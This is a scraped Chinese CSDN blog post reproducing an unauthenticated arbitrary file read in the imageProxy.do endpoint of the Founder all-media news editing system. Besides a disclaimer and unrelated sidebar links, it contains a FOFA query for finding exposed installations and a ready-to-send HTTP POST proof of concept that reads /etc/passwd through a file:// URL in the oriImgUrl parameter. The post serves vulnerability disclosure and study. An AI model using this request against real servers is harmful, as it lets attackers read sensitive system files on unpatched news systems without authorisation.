方正畅享全媒体新闻采编系统imageProxy.do任意文件读取

最新推荐文章于 2025-06-14 13:50:04 发布
最新推荐文章于 2025-06-14 13:50:04 发布
阅读量154 收藏 5
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全 漏洞复现 网络 漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/148267538
版权

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

问题描述

方正畅享全媒体新闻采编系统 imageProxy.do 接口存在任意文件读取,未经身份验证攻击者可读取系统重要文件。

fofa

app="FOUNDER-全媒体采编系统"

poc

POST /newsedit/outerfotobase/imageProxy.do HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: text/plain, */*; q=0.01

oriImgUrl=file:///etc/passwd

                

        

    

  



    



                



	

		

			

				
					
新闻采编系统 addOrUpdateOrg xxe漏洞

				
			

			

				

					iSee857的博客
				

				

					10-11
					
					686
					
				

			

		

		

			
				
新闻采编系统 addOrUpdateOrg 接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

			
		

	



                

            
              



	

		

			

				
					
pe系统如何读取手机_分下我日常使用的软件-安装操作系统-微 PE 工具箱-篇 二-如何进入PE系统...

				
			

			

				

					weixin_34315264的博客
				

				

					12-31
					
					2706
					
				

			

		

		

			
				
安装方法来源微 PE 工具箱官方网站著作权归作者所有。商业转载请联系作者授权,非商业转载请注明出处。作者:微 PE 工具箱链接:微 PE 工具箱来源:微 PE 工具箱篇二 如何进入PE 系统启动PE系统的关键操作顺序:第一步:在开机时进入主板的启动项列表;第二步:找到要启动的U盘,并辨别UEFI和Legeacy方式;第三步:选择一个合适的WinPE系统版本进入。第一步:在开机时进入主板的启动项列表...

			
		

	



              


  
              

                


	

		

			

				
					
方正畅新闻采编系统 binary.do SQL注入漏洞分析复现

				
			

			

				

					2401_83799022的博客
				

				

					09-06
					
					525
					
				

			

		

		

			
				
binary.do接口的TableName参数对传入的数据没有充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。继续分析后续代码的流程,我们可以知道该路由主要功能是根据传入的参数从数据库中查询图像路径,并将对应的图像文件发送到客户端。其中定义了一系列过滤器,我们可以发现如下配置,这里配置了关于URL 入口检查的过滤器,我们知道。通过以上分析我们可以发现传入的相应参数未经过任何过滤,直接拼接sql语句中。方法,这里执行的操作是执行一个 SQL 查询,并传递查询参数。

			
		

	





	

		

			

				
					
2024年12月近日漏洞 漏洞情报

				
			

			

				

					CZDN_0dayPoz的博客
				

				

					12-20
					
					1009
					
				

			

		

		

			
				
用友U8 Cloud ReleaseRepMngAction 存在SQL注入漏洞(CNVD-2024-33023)Sitecore CMS 未经身份验证export 任意文件读取漏洞复现(CVE-2024-6781)Cleo文件传输软件Synchronization 存在任意文件读取漏洞(CVE-2024-50623)MitelMiCollab 身份绕过导致任意文件读取漏洞复现(CVE-2024-41713).d。CRMEB save_basics存在任意文件下载漏洞(CVE-2024-52726)

			
		

	



		

			
		



	

		

			

				
					
2024年12月近日漏洞 漏洞情报下载

				
			

			

				

					CZDN_0dayPoz的博客
				

				

					12-20
					
					818
					
				

			

		

		

			
				
用友U8 Cloud ReleaseRepMngAction 存在SQL注入漏洞(CNVD-2024-33023)Sitecore CMS 未经身份验证export 任意文件读取漏洞复现(CVE-2024-6781)Cleo文件传输软件Synchronization 存在任意文件读取漏洞(CVE-2024-50623)MitelMiCollab 身份绕过导致任意文件读取漏洞复现(CVE-2024-41713).d。CRMEB save_basics存在任意文件下载漏洞(CVE-2024-52726)

			
		

	





	

		

			

				
					
方正计算机如何用u盘安装系统,方正电脑用u盘装系统操作方法

				
			

			

				

					weixin_28914101的博客
				

				

					07-29
					
					6916
					
				

			

		

		

			
				
方正电脑用u盘装系统操作方法。当我们的电脑系统出现故障的时候,需要使用光盘或U盘引导进行系统重装,但是现在很多电脑都不再配带光驱,使用光盘重装系统的人是越来越少了,当下最受欢迎的是用u盘装系统,那么如何用u盘给电脑安装系统呢?今天小编以方正电脑为例,跟大家分方正电脑用u盘装系统操作方法。一、安装准备1、准备一个容量4G以上U盘,利用云骑士装机大师将u盘制作成启动盘2、下载win7系统镜像文件(以...

			
		

	





	

		

			

				
					
方正计算机如何用u盘安装系统,方正台式电脑如何设置U盘启动

				
			

			

				

					weixin_39857211的博客
				

				

					07-29
					
					4347
					
				

			

		

		

			
				
我们在使用方正电脑的时候,有的情况下因为一些操作不当或者是系统自身的问题可能就会导致电脑无法正常使用。对于这种情况我们可以重装系统来对电脑进行修复。如果使用U盘来重装,我们可以先进入电脑的bios来讲启动项设置为U盘即可。具体步骤就来看下小编是怎么做的吧~希望可以帮助到你。方正台式电脑如何设置U盘启动1、同样的开机按Del键进入该BIOS设置界面,选择高级BIOS设置;2、也是选择高级BIOS设置...

			
		

	





	

		

			

				
					
pe系统如何读取手机_图文详解怎么用pe重做系统

				
			

			

				

					weixin_35587674的博客
				

				

					01-16
					
					2651
					
				

			

		

		

			
				
上期小编讲解了小编教你笔记本电脑开不了机怎么办,本次正特手机网小编给大家讲解一下图文详解怎么用pe重做系统,最近有不少的小伙伴都问小编说,使用pe重做系统简单吗?对于大家提问pe重做电脑系统的问题,其实是很简单的。今天小编就来给大家说说使用pe重做系统的方法,让你们自己就知道如何操作。小伙伴们,你们知道如何在pe系统下进行重装系统吗?估计大多数的人都还不清楚该如何操作吧,不知道的话,那也没关系哟,...

			
		

	





	

		

			

				
					
解析教务系统查看平时成绩(方正教务系统

					
热门推荐

				
			

			

				

					weixin_39523034的博客
				

				

					07-18
					
					2万+
					
				

			

		

		

			
				
好啦,身患懒癌的我终于迎来了更新。

干货,很干很干的货。期末考试完了很多小伙伴都在等成绩的出来,成绩出来又只有一个最终成绩,所以才有了这次的更新,教大家如何查看自己的平时成绩和卷面成绩!!!(P.S:因为有学长好像写过类似文章,大致方法差不多,如有雷同纯属巧合)好吧,废话不多说,开始啦!

准备工具:Chrome浏览器、方正教务系统账号(也就是你们的学号)

Let's do it!

首先打开...

			
		

	





	

		

			

				
					
方正畅全媒体新闻采编系统任意文件读取漏洞

				
			

			

				

					03-14
				

			

		

		

			
				
### 方正畅全媒体新闻采编系统任意文件读取漏洞分析  #### 漏洞详情 方正畅全媒体新闻采编系统存在任意文件读取漏洞,此漏洞允许未经过身份验证的攻击者访问服务器上的敏感文件。这些文件可能包括但不限于数据库...

			
		

	





	

		

			

				
					
信息时代  内容为王——方正畅全媒体采集系统:更全面、更快速地创造高品质内容.pdf

				
			

			

				

					10-10
				

			

		

		

			
				
"方正畅全媒体采集系统:更全面、更快速地创造高品质内容"  本系统旨在帮助传统报业转型为全媒体内容提供商,提供了一个更快速、更全面的内容采集和生产系统。该系统具有以下几个特点:  1. 统一管理新闻线索:...

			
		

	





	

		

			

				
					
安全生产台账系统

				
			

			

				

					hanwei020502的博客
				

				

					06-14
					
					346
					
				

			

		

		

			
				

			
		

	





	

		

			

				
					
Trivy离线扫描:容器安全实践指南!

				
			

			

				

					tersky的专栏
				

				

					06-13
					
					649
					
				

			

		

		

			
				
Trivy离线扫描:容器安全实践指南!

			
		

	





	

		

			

				
					
代码填空题技术实现:突破 highlight.js 安全限制的工程实践

				
			

			

				

					半岛铁盒里
				

				

					06-11
					
					1259
					
				

			

		

		

			
				
本文探讨了在交互式代码教育平台中实现代码填空题的技术方案。针对highlight.js过滤HTML标签导致无法直接插入输入框的问题,作者提出了先完成语法高亮再修改DOM的双阶段解决方案。关键技术包括:1) 利用nextTick确保Vue DOM更新;2) 采用MutationObserver监听高亮渲染完成;3) 在渲染后插入受控输入框元素。方案解决了安全性问题,同时优化了用户交互体验,包括输入框索引跟踪和状态保存。特别强调了在处理异步渲染时,MutationObserver比嵌套nextTick更可靠。该

			
		

	





	

		

			

				
					
软件测试之简单基础的安全测试方法(另外包含软测面试题库)

					
最新发布

				
			

			

				

					qq_39635178的博客
				

				

					06-14
					
					560
					
				

			

		

		

			
				
阅读本文前请注意最后编辑时间,文章内容可能与目前最新的技术发展情况相去甚远。欢迎各位评论与私信,指出错误或是进行交流等。

			
		

	





	

		

			

				
					
Proof of Talk专访CertiK联创顾荣辉:全周期安全方案护航Web3生态

				
			

			

				

					weixin_58310340的博客
				

				

					06-11
					
					876
					
				

			

		

		

			
				
6月10日,CertiK联合创始人兼CEO顾荣辉在Proof of Talk 2025举办期间,接受大会官方专访,分了他对Web3安全现状的观察以及CertiK的安全战略布局。

			
		

	





	

		

			

				
					
水库大坝安全监测之渗流监测

				
			

			

				

					weixin_48039531的博客
				

				

					06-12
					
					745
					
				

			

		

		

			
				
通过在坝体和坝基不同位置埋设测压管或渗压计等仪器,监测不同深度、不同位置的渗流压力,绘制等势线,分析渗流场分布情况,评估大坝防渗效果与渗透稳定性。结合大坝整体安全状况,综合分析渗流监测数据与其他监测项目(如变形监测、应力应变监测等)数据,为大坝维护、加固等决策提供全面、科学的支持,确保水库大坝长期安全稳定运行。通过在坝体或坝基中铺设光纤,利用光纤中光信号与周围环境相互作用产生的变化,如光的强度、相位、频率等,感知渗流场参数,如渗流压力、温度等。对比不同部位的渗流压力分布,评估大坝防渗效果和渗流场的均匀性。

			
		

	





	

		

			

				
					
菌菇食用攻略:从营养解析到安全指南,解锁科学食菌

				
			

			

				

					2503_90208218的博客
				

				

					06-11
					
					1237
					
				

			

		

		

			
				
菌菇食用安全与营养指南 菌菇营养丰富,富含蛋白质、维生素D及抗氧化物质,但食用不当存在风险。安全食用需注意:彻底加热(中心温度达74℃以上)、控制摄入量(成人每日100-150g)、特殊人群谨慎选择(过敏者、孕妇、慢性病患者等)。野生菌中毒事件频发,切勿轻信民间鉴别方法,应选择正规渠道购买。娱乐化传播菌菇中毒危害严重,需加强科学认知。合理食用菌菇需平衡其营养价值与潜在风险,遵循个体化膳食原则。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值